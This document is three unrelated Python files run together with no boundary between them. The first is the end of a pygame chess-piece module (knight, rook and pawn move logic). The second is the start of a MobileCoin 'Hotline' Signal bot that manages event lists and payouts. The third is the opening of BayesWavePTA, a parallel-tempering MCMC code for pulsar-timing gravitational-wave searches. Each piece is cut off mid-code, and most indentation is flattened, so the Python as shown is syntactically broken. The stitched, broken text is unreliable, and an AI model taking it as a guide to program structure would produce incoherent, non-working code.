while tile[0] <= 7 and tile[0] >= 0 and tile[1] <= 7 and tile[1] >= 0 and not broken:
if board_state[tile[0]][tile[1]] == 0:
self.moves.append(tile)
elif board_state[tile[0]][tile[1]].get_team() != self.team:
self.moves.append(tile)
broken = True
else:
broken = True
tile = [tile[0] + direction[0], tile[1] + direction[1]]
return self.moves
def move(self, tile, clicked_state, board_state, pieces):
board_state[tile[0]][tile[1]] = self
board_state[self.tile[0]][self.tile[1]] = 0
#Taking an enemy piece
if clicked_state != 0 and clicked_state.get_team() != self.team:
clicked_state.set_taken(True)
self.tile = tile
self.pos = [self.board_start[0] + self.tile_size * self.tile[0] + self.offset[0],
self.board_start[1] + self.tile_size * self.tile[1] + self.offset[1]]
return board_state, pieces
#-------------------------------------------------------------------------------------------------------------------
class Knight(Piece):
def __init__(self, window, board_start, tile_size, team, scale_factor, ratio, origin):
image = pygame.image.load("assets\{}{}.png".format(team, "Knight"))
image = pygame.transform.scale(image, (int(scale_factor * ratio * 0.9), int(scale_factor * 0.9)))
self.offset = [tile_size * 0.275, tile_size * 0.15]
self.piece = "Knight"
super().__init__(window, board_start, tile_size, 3, team, image, origin)
def get_moves(self, board_state):
self.moves = []
directions = [[1, 2], [2, 1], [2, -1], [1, -2], [-1, -2], [-2, -1], [-2, 1], [-1, 2]]
for direction in directions:
tile = [self.tile[0] + direction[0], self.tile[1] + direction[1]]
if tile[0] <= 7 and tile[0] >= 0 and tile[1] <= 7 and tile[1] >= 0:
if board_state[tile[0]][tile[1]] == 0:
self.moves.append(tile)
elif board_state[tile[0]][tile[1]].get_team() != self.team:
self.moves.append(tile)
return self.moves
def move(self, tile, clicked_state, board_state, pieces):
board_state[tile[0]][tile[1]] = self
board_state[self.tile[0]][self.tile[1]] = 0
#Taking an enemy piece
if clicked_state != 0 and clicked_state.get_team() != self.team:
clicked_state.set_taken(True)
self.tile = tile
self.pos = [self.board_start[0] + self.tile_size * self.tile[0] + self.offset[0],
self.board_start[1] + self.tile_size * self.tile[1] + self.offset[1]]
return board_state, pieces
#-------------------------------------------------------------------------------------------------------------------
class Rook(Piece):
def __init__(self, window, board_start, tile_size, team, scale_factor, ratio, origin):
image = pygame.image.load("assets\{}{}.png".format(team, "Rook"))
image = pygame.transform.scale(image, (int(scale_factor * ratio * 0.9), int(scale_factor * 0.9)))
self.offset = [tile_size * 0.275, tile_size * 0.15]
self.piece = "Rook"
self.never_moved = True
super().__init__(window, board_start, tile_size, 5, team, image, origin)
def get_moves(self, board_state):
self.moves = []
directions = [[0, 1], [0, -1], [1, 0], [-1, 0]]
for direction in directions:
tile = [self.tile[0] + direction[0], self.tile[1] + direction[1]]
broken = False
while tile[0] <= 7 and tile[0] >= 0 and tile[1] <= 7 and tile[1] >= 0 and not broken:
if board_state[tile[0]][tile[1]] == 0:
self.moves.append(tile)
elif board_state[tile[0]][tile[1]].get_team() != self.team:
self.moves.append(tile)
broken = True
else:
broken = True
tile = [tile[0] + direction[0], tile[1] + direction[1]]
return self.moves
def move(self, tile, clicked_state, board_state, pieces):
board_state[tile[0]][tile[1]] = self
board_state[self.tile[0]][self.tile[1]] = 0
#Taking an enemy piece
if clicked_state != 0 and clicked_state.get_team() != self.team:
clicked_state.set_taken(True)
self.never_moved = False
self.tile = tile
self.pos = [self.board_start[0] + self.tile_size * self.tile[0] + self.offset[0],
self.board_start[1] + self.tile_size * self.tile[1] + self.offset[1]]
return board_state, pieces
def get_never_moved(self):
return self.never_moved
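#Hedged refactor sketch, unused by the classes above: Queen, Bishop and Rook
#repeat the same ray-casting loop and differ only in their direction sets, so
#the shared walk could live in one module-level helper like this.
def _sliding_moves(piece, board_state, directions):
    moves = []
    for direction in directions:
        tile = [piece.get_tile()[0] + direction[0], piece.get_tile()[1] + direction[1]]
        while 0 <= tile[0] <= 7 and 0 <= tile[1] <= 7:
            square = board_state[tile[0]][tile[1]]
            if square == 0:
                moves.append(tile)
            else:
                if square.get_team() != piece.get_team():
                    moves.append(tile)
                break
            tile = [tile[0] + direction[0], tile[1] + direction[1]]
    return moves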
#-------------------------------------------------------------------------------------------------------------------
class Pawn(Piece):
def __init__(self, window, board_start, tile_size, team, scale_factor, ratio, origin):
image = pygame.image.load("assets\{}{}.png".format(team, "Pawn"))
image = pygame.transform.scale(image, (int(scale_factor * ratio * 0.8), int(scale_factor * 0.8)))
self.offset = [tile_size * 0.3, tile_size * 0.2]
self.piece = "Pawn"
self.en_passant = False
self.never_moved = True
super().__init__(window, board_start, tile_size, 1, team, image, origin)
if self.team == "white":
self.direction = -1
else:
self.direction = 1
def get_moves(self, board_state):
self.moves = []
#Moving forward
if board_state[self.tile[0]][self.tile[1] + 1 * self.direction] == 0:
self.moves.append([self.tile[0], self.tile[1] + 1 * self.direction])
#Double Move
if self.never_moved:
if board_state[self.tile[0]][self.tile[1] + 2 * self.direction] == 0:
self.moves.append([self.tile[0], self.tile[1] + 2 * self.direction])
#Diagonal take
if self.tile[0] != 7:
if board_state[self.tile[0] + 1][self.tile[1] + 1 * self.direction] != 0:
if board_state[self.tile[0] + 1][self.tile[1] + 1 * self.direction].get_team() != self.team:
self.moves.append([self.tile[0] + 1, self.tile[1] + 1 * self.direction])
#En-Passant
if (board_state[self.tile[0] + 1][self.tile[1]] != 0 and board_state[self.tile[0] + 1][self.tile[1]].get_piece() == "Pawn" and
board_state[self.tile[0] + 1][self.tile[1]].get_en_passant() and
board_state[self.tile[0] + 1][self.tile[1]].get_team() != self.team):
self.moves.append([self.tile[0] + 1, self.tile[1] + 1 * self.direction])
if self.tile[0] != 0:
            if board_state[self.tile[0] - 1][self.tile[1] + 1 * self.direction] != 0:
                if board_state[self.tile[0] - 1][self.tile[1] + 1 * self.direction].get_team() != self.team:
                    self.moves.append([self.tile[0] - 1, self.tile[1] + 1 * self.direction])
            #En-Passant (mirror of the +1 diagonal above)
            if (board_state[self.tile[0] - 1][self.tile[1]] != 0 and board_state[self.tile[0] - 1][self.tile[1]].get_piece() == "Pawn" and
                board_state[self.tile[0] - 1][self.tile[1]].get_en_passant() and
                board_state[self.tile[0] - 1][self.tile[1]].get_team() != self.team):
                self.moves.append([self.tile[0] - 1, self.tile[1] + 1 * self.direction])
        return self.moves
#!/usr/bin/python3.9
# Copyright (c) 2021 MobileCoin Inc.
# Copyright (c) 2021 The Forest Team
import asyncio
import json
import string
import time
import math
import logging
from decimal import Decimal
from typing import Optional
from forest import utils
from forest.core import (
Message,
Response,
hide,
requires_admin,
is_admin,
get_uid,
run_bot,
)
from forest.extra import DialogBot
from forest.pdictng import aPersistDict, aPersistDictOfInts, aPersistDictOfLists
from mc_util import pmob2mob
FEE = int(1e12 * 0.0004)
class Hotline(DialogBot): # pylint: disable=too-many-public-methods
def __init__(self) -> None:
self.no_repay: list[str] = []
self.pending_orders: aPersistDict[str] = aPersistDict("pending_orders")
self.pending_funds: aPersistDict[str] = aPersistDict("pending_funds")
self.pending_donations: aPersistDict[str] = aPersistDict("pending_donations")
self.event_limits = aPersistDictOfInts("event_limits")
self.event_prompts: aPersistDict[str] = aPersistDict("event_prompts")
self.event_prices: aPersistDict[float] = aPersistDict("event_prices")
# self.event_images: aPersistDict[str] = aPersistDict("event_images")
self.event_owners: aPersistDictOfLists[str] = aPersistDictOfLists(
"event_owners"
)
self.event_attendees: aPersistDictOfLists[str] = aPersistDictOfLists(
"event_attendees"
)
self.event_lists: aPersistDictOfLists[str] = aPersistDictOfLists("event_lists")
self.list_owners: aPersistDictOfLists[str] = aPersistDictOfLists("list_owners")
self.easter_eggs: aPersistDict[str] = aPersistDict("easter_eggs")
self.successful_pays: aPersistDictOfLists[str] = aPersistDictOfLists(
"successful_pays"
)
self.payout_balance_mmob = aPersistDictOfInts("payout_balance_mmob")
self.challenging: aPersistDict[bool] = aPersistDict("challenging")
self.charities: aPersistDict[str] = aPersistDict("charities")
self.charities_balance_mmob: aPersistDictOfInts = aPersistDictOfInts(
"charities_balance_mmob"
)
self.scratch_pad: aPersistDict[str] = aPersistDict("scratch_pad")
self.pay_lock: asyncio.Lock = asyncio.Lock()
self.donations: aPersistDict[str] = aPersistDict("donations")
self.first_messages: aPersistDict[int] = aPersistDict("first_messages")
self.last_prompted: aPersistDict[int] = aPersistDict("last_prompted")
# okay, this now maps the tag (restore key) of each of the above to the instance of the PersistDict class
self.state = {
self.__getattribute__(attr).tag: self.__getattribute__(attr)
for attr in dir(self)
if isinstance(self.__getattribute__(attr), aPersistDict)
}
super().__init__()
@requires_admin
async def do_dump(self, msg: Message) -> Response:
"""dump | dump <event>
returns a JSON serialization of an event (or all events)"""
obj = (msg.arg1 or "").lower()
dump = {}
for eventcode in list(await self.event_owners.keys()) + list(
await self.list_owners.keys()
):
event = {}
for parameters in self.state:
if await self.state[parameters].get(eventcode):
event[parameters] = await self.state[parameters].get(eventcode)
dump[eventcode] = event
return json.dumps(dump if not obj else dump.get(obj), indent=2)
async def check_user_owns(self, user_uuid: str, list_name: str) -> Optional[str]:
"""returns 'event' if the user owns the specified event, or 'list' if the user owns the list."""
if user_uuid in await self.event_owners.get(list_name.lower(), []):
return "event"
if user_uuid in await self.list_owners.get(list_name.lower(), []):
return "list"
return None
async def do_check(self, msg: Message) -> Response:
"""check | check <list_or_event>
returns all lists the user's on, or optionally info about a specified list."""
obj = (msg.arg1 or "").lower()
user = msg.uuid or msg.source
if msg.arg1 and await self.check_user_owns(user, msg.arg1):
return "\n\n".join(
[
f"code: {obj}",
f"prompt: {await self.event_prompts.get(obj)}",
f"limit: {await self.event_limits.get(obj)}",
f"join price: {await self.event_prices.get(obj, 0)}MOB/ea",
f"event owned by: {[await self.get_displayname(uuid) for uuid in await self.event_owners.get(obj, [])]}",
f"announce list owned by: {[await self.get_displayname(uuid) for uuid in await self.list_owners.get(obj, [])]}",
f"number paid attendees: {len(await self.event_attendees.get(obj, []))}",
f"paid attendees: {[await self.get_displayname(uuid) for uuid in await self.event_attendees.get(obj, [])]}",
f"list has {len(await self.event_lists.get(obj,[]))} members",
f"list members: {[await self.get_displayname(uuid) for uuid in await self.event_lists.get(obj, [])]}",
f"CAPTCHA enabled: {await self.challenging.get(obj, False)}",
f"balance: {await self.payout_balance_mmob.get(obj, 0)}mmob",
]
)
lists_ = [
list_
for list_ in await self.event_lists.keys()
if user in await self.event_lists.get(list_, [])
]
owns_event, owns_list = await self._get_user_owns(user)
return f"You're on the list for {lists_}.\n\nYou own these paid events: {owns_event}\n\nYou own these free lists: {owns_list}\n\nFor more information reply: check <code>."
async def do_stop(self, msg: Message) -> Response:
"""stop | stop <list>
Removes user from all lists (optionally, specified list)."""
removed = 0
if msg.arg1 and msg.uuid in await self.event_lists.get(
(msg.arg1 or "").lower(), []
):
await self.event_lists.remove_from((msg.arg1 or "").lower(), msg.uuid)
return f"Okay, removed you from {msg.arg1}"
if not msg.arg1:
for list_ in await self.event_lists.keys():
if msg.uuid in await self.event_lists.get(list_, []):
await self.event_lists.remove_from(list_, msg.uuid)
await self.send_message(
msg.uuid,
f"Removed you from list {list_}, to rejoin send 'subscribe {list_}'",
)
removed += 1
if msg.arg1 and not removed:
return f"Sorry, you're not on the announcement list for {msg.arg1}" # thanks y?!
if not removed:
return "You're not on any lists!"
return None
@hide
async def do_payout(self, msg: Message) -> Response:
"""Sweeps all balance for an event to the requesting owner.
Prompts admin for approval."""
# pylint: disable=too-many-return-statements
user = msg.uuid
list_ = (msg.arg1 or "").lower()
user_owns = await self.check_user_owns(user, list_)
balance = await self.payout_balance_mmob.get(list_, 0)
if is_admin(msg) or (user_owns and balance):
if not await self.ask_yesno_question(
utils.get_secret("ADMIN"),
f"Owner of {list_} requests payout of {balance}. Approve?",
):
return "Sorry, admin rejected your payout."
return await self.pay_user_from_balance(user, list_, balance - 1)
return "Sorry, no luck"
async def pay_user_from_balance(
self, user: str, list_: str, amount_mmob: int
) -> Optional[str]:
"""Pays a user a given amount of MOB by manually grabbing UTXOs until a transaction can be made.
Assumptions made:"""
# pylint: disable=too-many-return-statements,too-many-locals,too-many-branches
balance = await self.payout_balance_mmob.get(list_, 0)
await self.send_typing(recipient=user)
# pad fees
logging.debug(f"PAYING {amount_mmob}mmob from {balance} of {list_}")
if amount_mmob < balance:
async with self.pay_lock:
utxos = list(reversed((await self.mobster.get_utxos()).items()))
input_pmob_sum = 0
input_txo_ids = []
# dust
skipped_utxos = []
# acquire utxos
while input_pmob_sum < ((amount_mmob + 1) * 1_000_000_000):
if utxos:
# get a txoid and amount to check
txoid, pmob = utxos.pop()
else:
# no utxos left, we've reviewed all of the available ones.
                        # release so the recursive child calls can re-acquire
self.pay_lock.release()
# recurse with smaller amounts
first_half = await self.pay_user_from_balance(
user, list_, amount_mmob // 2
)
# if first leg succeeds..
if first_half and "Paid" in first_half:
# let's do it again
second_half = await self.pay_user_from_balance(
user, list_, amount_mmob // 2
)
# and if we're winning
if second_half and "Paid" in second_half:
# acquire to exit-handler more nicely
await self.pay_lock.acquire()
return f"Paid you you {amount_mmob/1000}MOB"
else:
# sadly acquire lock in defeat
await self.pay_lock.acquire()
return None
if pmob < (amount_mmob * 1_000_000_000) // 15:
logging.debug(f"skipping UTXO worth {pmob}pmob")
skipped_utxos += [(txoid, pmob)]
continue
input_txo_ids += [txoid]
input_pmob_sum += pmob
if len(input_txo_ids) > 15:
return "Something went wrong! Please contact your administrator for support. (too many utxos needed)"
# how many slots do we have for dust?
dust_space = 16 - len(input_txo_ids)
# grab dust up to 16 utxos total or up to # dust, whichever is smaller
logging.info(
f"Space for {dust_space}, we have {len(skipped_utxos)} presumed dust!"
)
for _ in range(min(dust_space, len(skipped_utxos))):
# smallest dust = higher priority for cleaning
dust_txoid, dust_val_pmob = skipped_utxos.pop(0)
input_txo_ids.append(dust_txoid)
logging.debug(
f"grabbing dust worth {dust_val_pmob}pmob to fill empty space in transaction inputs"
)
input_pmob_sum += dust_val_pmob
logging.debug(
f"found: {input_pmob_sum} / {amount_mmob*1_000_000_000} across {len(input_txo_ids)}utxos"
)
if not input_txo_ids:
return "Something went wrong! Please contact your administrator for support. (not enough utxos)"
# build a memo lookup key for the relevant list
MEMO_KEY = "PAY_MEMO_" + list_
# attempt to fetch PAY_MEMO_list_ falling back to DEFAULT_PAY_MEMO
memo_dialog = await self.dialog.get(
MEMO_KEY, None
) or await self.dialog.get("DEFAULT_PAY_MEMO", "DEFAULT_PAY_MEMO")
result = await self.send_payment(
recipient=user,
amount_pmob=(amount_mmob * 1_000_000_000),
receipt_message=memo_dialog,
input_txo_ids=input_txo_ids,
confirm_tx_timeout=60,
)
await self.send_typing(recipient=user, stop=True)
if result and result.status == "tx_status_succeeded":
await self.payout_balance_mmob.decrement(list_, amount_mmob)
return f"Paid you you {amount_mmob/1000}MOB"
return None
if not balance:
return "Sorry, {list_} has 0mmob balance!" # thanks y?!
return "Sorry, can't help you."
@hide
async def do_pay(self, msg: Message) -> Response:
"""Allows an event/list owner to distribute available funds across those on a list."""
user = msg.uuid
if not msg.arg2 or not msg.arg2.isnumeric():
msg.arg2 = await self.ask_freeform_question(
msg.uuid,
"How many mMOB should each recipient recieve (1000mMOB = 1MOB)?",
)
if msg.arg2 == "0":
return "OK, cancelling."
        amount_mmob = 0  # placeholder, reassigned below
list_, amount, message = (
(msg.arg1 or "").lower(),
(msg.arg2 or "0"),
msg.arg3 or msg.arg1 or "",
)
if not amount.isnumeric() or not amount:
msg.arg2 = await self.ask_freeform_question(
user, "Please provide an amount of milliMOB as a number:"
)
if msg.arg2 == "0":
return "OK, cancelling."
return await self.do_pay(msg)
amount_mmob = int(amount)
if not list_:
msg.arg1 = await self.ask_freeform_question(
user, "Who would you like to send the mMOB to?"
)
return await self.do_pay(msg)
user_owns = await self.check_user_owns(user, list_)
if not is_admin(msg) and not user_owns:
return "Sorry, you are not authorized."
return await self.pay_list(msg, amount_mmob, list_, message)
async def pay_list(
self,
msg: Message,
amount_mmob: int,
list_: str,
message: str,
) -> Response:
"Actually distribute funds across those on a list." ""
if not (
list_ in await self.event_lists.keys()
or list_ in await self.event_attendees.keys()
):
return "Sorry, that's not a valid list or number!"
to_send = await self.event_lists.get(
            list_, [])
################################################################################
#
#BayesWavePTA -- Bayesian search for burst GW signals in PTA data based on the BayesWave algorithm
#
#<NAME> (<EMAIL>) -- 2020
################################################################################
import numpy as np
import matplotlib.pyplot as plt
import json
import enterprise
import enterprise.signals.parameter as parameter
from enterprise.signals import signal_base
from enterprise.signals import white_signals
from enterprise.signals import gp_signals
from enterprise.signals import utils
from enterprise.signals import deterministic_signals
from enterprise.signals import selections
from enterprise.signals.selections import Selection
from enterprise_extensions.frequentist import Fe_statistic
import enterprise_wavelets as models
import pickle
import shutil
import os
################################################################################
#
#MAIN MCMC ENGINE
#
################################################################################
def run_bw_pta(N, T_max, n_chain, pulsars, max_n_wavelet=1, min_n_wavelet=0, n_wavelet_prior='flat', n_wavelet_start='random', RJ_weight=0, glitch_RJ_weight=0,
regular_weight=3, noise_jump_weight=3, PT_swap_weight=1, T_ladder=None, T_dynamic=False, T_dynamic_nu=300, T_dynamic_t0=1000, PT_hist_length=100,
tau_scan_proposal_weight=0, tau_scan_file=None, draw_from_prior_weight=0,
de_weight=0, prior_recovery=False, wavelet_amp_prior='uniform', gwb_amp_prior='uniform', rn_amp_prior='uniform', per_psr_rn_amp_prior='uniform',
gwb_log_amp_range=[-18,-11], rn_log_amp_range=[-18,-11], per_psr_rn_log_amp_range=[-18,-11], wavelet_log_amp_range=[-18,-11],
vary_white_noise=False, efac_start=None, include_equad_ecorr=False, wn_backend_selection=False, noisedict_file=None,
include_gwb=False, gwb_switch_weight=0,
include_rn=False, vary_rn=False, num_wn_params=1, num_total_wn_params=None, rn_params=[-13.0,1.0], include_per_psr_rn=False, vary_per_psr_rn=False, per_psr_rn_start_file=None,
jupyter_notebook=False, gwb_on_prior=0.5,
max_n_glitch=1, glitch_amp_prior='uniform', glitch_log_amp_range=[-18, -11], n_glitch_prior='flat', n_glitch_start='random', t0_min=0.0, t0_max=10.0, tref=53000*86400,
glitch_tau_scan_proposal_weight=0, glitch_tau_scan_file=None, TF_prior_file=None, f0_min=3.5e-9, f0_max=1e-7,
save_every_n=10000, savefile=None, safe_save=False, resume_from=None, start_from=None, n_status_update=100, n_fish_update=1000):
if num_total_wn_params is None:
num_total_wn_params = num_wn_params*len(pulsars)
if TF_prior_file is None:
TF_prior = None
else:
with open(TF_prior_file, 'rb') as f:
TF_prior = pickle.load(f)
ptas = get_ptas(pulsars, vary_white_noise=vary_white_noise, include_equad_ecorr=include_equad_ecorr, wn_backend_selection=wn_backend_selection, noisedict_file=noisedict_file, include_rn=include_rn, vary_rn=vary_rn, include_per_psr_rn=include_per_psr_rn, vary_per_psr_rn=vary_per_psr_rn, include_gwb=include_gwb, max_n_wavelet=max_n_wavelet, efac_start=efac_start, rn_amp_prior=rn_amp_prior, rn_log_amp_range=rn_log_amp_range, rn_params=rn_params, per_psr_rn_amp_prior=per_psr_rn_amp_prior, per_psr_rn_log_amp_range=per_psr_rn_log_amp_range, gwb_amp_prior=gwb_amp_prior, gwb_log_amp_range=gwb_log_amp_range, wavelet_amp_prior=wavelet_amp_prior, wavelet_log_amp_range=wavelet_log_amp_range, prior_recovery=prior_recovery, max_n_glitch=max_n_glitch, glitch_amp_prior=glitch_amp_prior, glitch_log_amp_range=glitch_log_amp_range, t0_min=t0_min, t0_max=t0_max, f0_min=f0_min, f0_max=f0_max, TF_prior=TF_prior, tref=tref)
print(ptas)
for i in range(len(ptas)):
for j in range(len(ptas[i])):
for k in range(len(ptas[i][j])):
print(i,j,k)
print(ptas[i][j][k].params)
#point_to_test = np.tile(np.array([0.0, 0.54, 1.0, -8.0, -13.39, 2.0, 0.5]),i+1)
print(ptas[-1][-1][-1].summary())
#setting up temperature ladder
if T_ladder is None:
#using geometric spacing
c = T_max**(1.0/(n_chain-1))
Ts = c**np.arange(n_chain)
#make highest temperature inf if dynamic T ladder is used
if T_dynamic:
Ts[-1] = np.inf
print("Using {0} temperature chains with a geometric spacing of {1:.3f}.\
Temperature ladder is:\n".format(n_chain,c),Ts)
else:
Ts = np.array(T_ladder)
n_chain = Ts.size
#make highest temperature inf if dynamic T ladder is used
if T_dynamic:
Ts[-1] = np.inf
print("Using {0} temperature chains with custom spacing: ".format(n_chain),Ts)
if T_dynamic:
print("Dynamic temperature adjustment: ON")
else:
print("Dynamic temperature adjustment: OFF")
#set up array to hold acceptance probabilities of last PT_hist_length PT swaps
PT_hist = np.ones((n_chain-1,PT_hist_length))*np.nan #initiated with NaNs
PT_hist_idx = np.array([0]) #index to keep track of which row to update in PT_hist
    #printing out the prior used on GWB on/off
if include_gwb:
print("Prior on GWB on/off: {0}%".format(gwb_on_prior*100))
#set up and print out prior on number of wavelets
if max_n_wavelet!=0:
if n_wavelet_prior=='flat':
n_wavelet_prior = np.ones(max_n_wavelet+1)/(max_n_wavelet+1-min_n_wavelet)
for i in range(min_n_wavelet):
n_wavelet_prior[i] = 0.0
else:
n_wavelet_prior = np.array(n_wavelet_prior)
n_wavelet_norm = np.sum(n_wavelet_prior)
n_wavelet_prior *= 1.0/n_wavelet_norm
print("Prior on number of wavelets: ", n_wavelet_prior)
#set up and print out prior on number of glitches
if max_n_glitch!=0:
if n_glitch_prior=='flat':
n_glitch_prior = np.ones(max_n_glitch+1)/(max_n_glitch+1)
else:
n_glitch_prior = np.array(n_glitch_prior)
n_glitch_norm = np.sum(n_glitch_prior)
n_glitch_prior *= 1.0/n_glitch_norm
print("Prior on number of glitches: ", n_glitch_prior)
#setting up array for the samples
num_params = max_n_wavelet*10+max_n_glitch*6
    num_params += 2 #for keeping a record of number of wavelets and glitches
if include_gwb:
num_params += 1
num_per_psr_params = 0
num_noise_params = 0
if vary_white_noise:
num_per_psr_params += num_total_wn_params
num_noise_params += num_total_wn_params
if vary_rn:
num_noise_params += 2
if vary_per_psr_rn:
num_per_psr_params += 2*len(pulsars)
num_noise_params += 2*len(pulsars)
num_params += num_noise_params
print('-'*5)
print(num_params)
print(num_noise_params)
print(num_per_psr_params)
print('-'*5)
if resume_from is not None:
print("Resuming from file: " + resume_from)
npzfile = np.load(resume_from)
swap_record = list(npzfile['swap_record'])
log_likelihood_resume = npzfile['log_likelihood']
betas_resume = npzfile['betas']
PT_acc_resume = npzfile['PT_acc']
samples_resume = npzfile['samples']
N_resume = samples_resume.shape[1]
print("# of samples sucessfully read in: " + str(N_resume))
samples = np.zeros((n_chain, N_resume+N, num_params))
samples[:,:N_resume,:] = np.copy(samples_resume)
log_likelihood = np.zeros((n_chain,N_resume+N))
log_likelihood[:,:N_resume] = np.copy(log_likelihood_resume)
betas = np.ones((n_chain,N_resume+N))
betas[:,:N_resume] = np.copy(betas_resume)
PT_acc = np.zeros((n_chain-1,N_resume+N))
PT_acc[:,:N_resume] = np.copy(PT_acc_resume)
else:
samples = np.zeros((n_chain, N, num_params))
#set up log_likelihood array
log_likelihood = np.zeros((n_chain,N))
#set up betas array with PT inverse temperatures
betas = np.ones((n_chain,N))
#set first row with initial betas
betas[:,0] = 1/Ts
print("Initial beta (1/T) ladder is:\n",betas[:,0])
#set up array holding PT acceptance rate for each iteration
PT_acc = np.zeros((n_chain-1,N))
#filling first sample at all temperatures with last sample of previous run's zero temperature chain (thus it works if n_chain is different)
if start_from is not None:
npzfile = np.load(start_from)
samples_start = npzfile['samples']
for j in range(n_chain):
samples[j,0,:] = np.copy(samples_start[0,-1,:])
#filling first sample with random draw
else:
for j in range(n_chain):
#set up n_wavelet
            if n_wavelet_start == 'random':
n_wavelet = np.random.choice( np.arange(min_n_wavelet,max_n_wavelet+1) )
else:
n_wavelet = n_wavelet_start
#set up n_glitch
            if n_glitch_start == 'random':
n_glitch = np.random.choice(max_n_glitch+1)
else:
n_glitch = n_glitch_start
samples[j,0,0] = n_wavelet
samples[j,0,1] = n_glitch
if j==0:
print("Starting with n_wavelet=",n_wavelet)
print("Starting with n_glitch=",n_glitch)
if n_wavelet!=0:
#making sure all wavelets get the same sky location and ellipticity
init_cos_gwtheta = ptas[n_wavelet][0][0].params[0].sample()
init_psi = ptas[n_wavelet][0][0].params[1].sample()
init_gwphi = ptas[n_wavelet][0][0].params[2].sample()
for which_wavelet in range(n_wavelet):
samples[j,0,2+0+which_wavelet*10] = init_cos_gwtheta
samples[j,0,2+1+which_wavelet*10] = init_psi
samples[j,0,2+2+which_wavelet*10] = init_gwphi
                #randomly pick other wavelet parameters separately for each wavelet
samples[j,0,2+3+which_wavelet*10:2+10+which_wavelet*10] = np.hstack(p.sample() for p in ptas[n_wavelet][0][0].params[3:10])
if n_glitch!=0:
for which_glitch in range(n_glitch):
samples[j,0,2+10*max_n_wavelet+which_glitch*6:2+10*max_n_wavelet+6+which_glitch*6] = np.hstack(p.sample() for p in ptas[0][n_glitch][0].params[:6])
if vary_white_noise and not vary_per_psr_rn:
if efac_start is not None:
samples[j,0,2+max_n_wavelet*10+max_n_glitch*6:2+max_n_wavelet*10+max_n_glitch*6+num_total_wn_params] = np.ones(num_total_wn_params)*efac_start
else:
samples[j,0,2+max_n_wavelet*10+max_n_glitch*6:2+max_n_wavelet*10+max_n_glitch*6+num_total_wn_params] = np.hstack(p.sample() for p in ptas[n_wavelet][0][0].params[n_wavelet*10:n_wavelet*10+num_total_wn_params])
elif vary_per_psr_rn and not vary_white_noise:
if per_psr_rn_start_file==None:
samples[j,0,2+max_n_wavelet*10+max_n_glitch*6:2+max_n_wavelet*10+max_n_glitch*6+2*len(pulsars)] = np.hstack(p.sample() for p in ptas[n_wavelet][0][0].params[n_wavelet*10:n_wavelet*10+2*len(pulsars)])
else:
RN_noise_data = np.load(per_psr_rn_start_file)
samples[j,0,2+max_n_wavelet*10+max_n_glitch*6:2+max_n_wavelet*10+max_n_glitch*6+2*len(pulsars)] = RN_noise_data['RN_start']
elif vary_per_psr_rn and vary_white_noise: #vary both per psr RN and WN
samples[j,0,2+max_n_wavelet*10+max_n_glitch*6:2+max_n_wavelet*10+max_n_glitch*6+2*len(pulsars)+num_total_wn_params] = np.hstack(p.sample() for p in ptas[n_wavelet][0][0].params[n_wavelet*10:n_wavelet*10+2*len(pulsars)+num_total_wn_params])
if vary_rn:
samples[j,0,2+max_n_wavelet*10+max_n_glitch*6+num_per_psr_params:2+max_n_wavelet*10+max_n_glitch*6+num_noise_params] = np.array([ptas[n_wavelet][0][0].params[n_wavelet*10+num_noise_params-2].sample(), ptas[n_wavelet][0][0].params[n_wavelet*10+num_noise_params-1].sample()])
if include_gwb:
samples[j,0,2+max_n_wavelet*10+max_n_glitch*6+num_noise_params] = ptas[n_wavelet][0][1].params[n_wavelet*10+num_noise_params].sample()
#printing info about initial parameters
for j in range(n_chain):
print(j)
print(samples[j,0,:])
n_wavelet = get_n_wavelet(samples, j, 0)
n_glitch = get_n_glitch(samples, j, 0)
if include_gwb:
gwb_on = get_gwb_on(samples, j, 0, max_n_wavelet, max_n_glitch, num_noise_params)
else:
gwb_on = 0
first_sample = strip_samples(samples, j, 0, n_wavelet, max_n_wavelet, n_glitch, max_n_glitch)
print(first_sample)
log_likelihood[j,0] = ptas[n_wavelet][n_glitch][gwb_on].get_lnlikelihood(first_sample)
print(log_likelihood[j,0])
print(ptas[n_wavelet][n_glitch][gwb_on].get_lnprior(first_sample))
#setting up array for the fisher eigenvalues
#one for wavelet parameters which we will keep updating
eig = np.ones((n_chain, max_n_wavelet, 10, 10))*0.1
#also one for the glitch parameters
eig_glitch = np.ones((n_chain, max_n_glitch, 6, 6))*0.03
#one for GWB and common rn parameters, which we will keep updating
if include_gwb:
eig_gwb_rn = np.broadcast_to( np.array([[1.0,0,0], [0,0.3,0], [0,0,0.3]]), (n_chain, 3, 3)).copy()
else:
eig_gwb_rn = np.broadcast_to( np.array([[1.0,0], [0,0.3]]), (n_chain, 2, 2)).copy()
#and one for white noise parameters, which we will also keep updating
eig_per_psr = np.broadcast_to(np.eye(num_per_psr_params)*0.1, (n_chain, num_per_psr_params, num_per_psr_params) ).copy()
#calculate wn eigenvectors
for j in range(n_chain):
n_wavelet = get_n_wavelet(samples, j, 0)
n_glitch = get_n_glitch(samples, j, 0)
per_psr_eigvec = get_fisher_eigenvectors(strip_samples(samples, j, 0, n_wavelet, max_n_wavelet, n_glitch, max_n_glitch), ptas[n_wavelet][0][0], T_chain=1/betas[j,0], n_wavelet=1, dim=num_per_psr_params, offset=n_wavelet*10+n_glitch*6)
eig_per_psr[j,:,:] = per_psr_eigvec[0,:,:]
#read in tau_scan data if we will need it
if tau_scan_proposal_weight+RJ_weight>0:
if tau_scan_file==None:
raise Exception("tau-scan data file is needed for tau-scan global propsals")
with open(tau_scan_file, 'rb') as f:
tau_scan_data = pickle.load(f)
print("Tau-scan data read in successfully!")
tau_scan = tau_scan_data['tau_scan']
print(len(tau_scan))
TAU_list = list(tau_scan_data['tau_edges'])
F0_list = tau_scan_data['f0_edges']
T0_list = tau_scan_data['t0_edges']
#check if same prior range was used
log_f0_max = float(ptas[-1][-1][-1].params[3]._typename.split('=')[2][:-1])
log_f0_min = float(ptas[-1][-1][-1].params[3]._typename.split('=')[1].split(',')[0])
t0_max = float(ptas[-1][-1][-1].params[8]._typename.split('=')[2][:-1])
t0_min = float(ptas[-1][-1][-1].params[8]._typename.split('=')[1].split(',')[0])
tau_max = float(ptas[-1][-1][-1].params[9]._typename.split('=')[2][:-1])
tau_min = float(ptas[-1][-1][-1].params[9]._typename.split('=')[1].split(',')[0])
print("#"*70)
print("Tau-scan and MCMC prior range check (they must be the same)")
print("tau_min: ", TAU_list[0], tau_min)
print("tau_max: ", TAU_list[-1], tau_max)
print("t0_min: ", T0_list[0][0]/3600/24/365.25, t0_min)
print("t0_max: ", T0_list[0][-1]/3600/24/365.25, t0_max)
